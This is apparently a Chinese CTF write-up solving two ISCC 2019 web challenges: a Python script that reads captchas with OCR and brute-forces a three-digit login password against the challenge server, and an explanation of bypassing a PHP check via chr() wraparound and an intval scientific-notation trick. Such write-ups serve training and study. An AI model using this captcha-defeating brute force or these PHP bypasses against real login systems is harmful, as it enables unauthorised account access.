2019 iscc两道简单的web题目
1.
题目如下
主要是识别验证码,这时候就要用到python大法了,啊哈哈哈。脚本如下(基于python3)
from PIL import Image
import pytesseract
import requests
url_index="http://39.100.83.188:8002/login.php"
url_image="http://39.100.83.188:8002/vcode.php"
header={
'Cookie': 'PHPSESSID=填你自己的'
}
for i in range(999,99,-1):
r=requests.post(url=url_image,headers=header)
with open("C:/python/vcode.png",'wb') as pic:
pic.write(r.content)
image=Image.open("C:/python/vcode.png")
text=pytesseract.image_to_string(image)
text=text[0:4].replace('O','0').replace('o','0').replace('l','1')
payload={'pwd':str(i),'user_code':text}
ra=requests.post(url=url_index,data=payload,headers=header)
print(ra.content.decode("utf-8"))
if 'flag' not in ra.content.decode('utf-8'):
print(" %s is nowing " %i)
else:
print(ra.content.decode('utf-8'))
我这里是倒着跑的,从999开始,运行后很快就发现了flag,
密码错误
999 is nowing
密码错误
998 is nowing
验证码错误
997 is nowing
flag is flag{*******}
flag is flag{*******}
密码错误
995 is nowing
验证码错误
994 is nowing
验证码错误
993 is nowing
密码错误
996过于真实,23333333.
2.
核心代码如下
for ($i = 0; $i < count($value); ++$i) {
if ($value[$i] > 32 && $value[$i] < 127) unset($value);
else $username .= chr($value[$i]);
if ($username == 'w3lc0me_To_ISCC2019' && intval($password) < 2333 && intval($password + 1) > 2333) {
echo 'Hello '.$username.'!', '<br>', PHP_EOL;
echo $flag, '<hr>';
第一个,value每一项的ascii值不能大于32,也不能小于127,但又要chr 后的值等于w3lc0me_To_ISCC2019,那就把每一个字符ascii值+256就行了。第二个要绕过intval,可以用22.22e3来绕过。intval(22.22e3)为22,而intval(22.22e3+1)则为22221,所以最后构造payload就行了。